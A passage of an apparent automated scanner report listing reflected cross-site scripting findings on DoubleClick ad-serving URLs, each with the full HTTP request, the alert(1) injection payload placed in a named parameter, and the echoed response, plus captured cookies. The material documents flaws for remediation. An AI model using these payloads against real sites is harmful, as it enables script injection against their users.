Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:35:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7441

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/f/1d2/%2a/r%3B236519140%3B5-0%3B0%3B44340201%3B3454-728/90%3B40726720/40744507/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=le982c"-alert(1)-"f7eecd04480&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjA
...[SNIP]...

2.25. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2115e"-alert(1)-"a9e584a7d9f was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=1005002115e"-alert(1)-"a9e584a7d9f&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
k%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=1005002115e"-alert(1)-"a9e584a7d9f&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscrip
...[SNIP]...

2.26. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ebc9"-alert(1)-"fe7d4fbae1a was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=1156117ebc9"-alert(1)-"fe7d4fbae1a&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=1156117ebc9"-alert(1)-"fe7d4fbae1a&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

2.27. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbb42"-alert(1)-"ab8fffa114e was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07fbb42"-alert(1)-"ab8fffa114e&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07fbb42"-alert(1)-"ab8fffa114e&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "fals
...[SNIP]...

2.28. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e10b"-alert(1)-"059a3aecd25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=&3e10b"-alert(1)-"059a3aecd25=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5958

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=&3e10b"-alert(1)-"059a3aecd25=1http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "false";
var
...[SNIP]...

2.29. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b67a"-alert(1)-"f51039e8e90 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=7b67a"-alert(1)-"f51039e8e90 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=7b67a"-alert(1)-"f51039e8e90http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "always";

var openWindow = "false";
var w
...[SNIP]...

2.30. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05be"-alert(1)-"3b8c2aa8f2c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629f05be"-alert(1)-"3b8c2aa8f2c&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 09 May 2011 15:36:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5946

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3b02/7/aa/%2a/m%3B240603520%3B0-0%3B0%3B63480535%3B3454-728/90%3B41067063/41084850/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629f05be"-alert(1)-"3b8c2aa8f2c&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
va
...[SNIP]...

2.31. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.6441.USATODAY.COM/B5327539.11

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1665'-alert(1)-'43ef9d0e469 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2883.6441.USATODAY.COM/B5327539.11;sz=a1665'-alert(1)-'43ef9d0e469 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 36418
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:08 GMT
Expires: Mon, 09 May 2011 15:37:08 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
g=1;v=1;pid=62098467;aid=240223213;ko=0;cid=41821555;rid=41839342;rv=2;rn=2512943;";
this.swfParams = 'ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&src=1762894&rv=2&rid=41839342&=a1665'-alert(1)-'43ef9d0e469&';
this.renderingId = "41839342";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

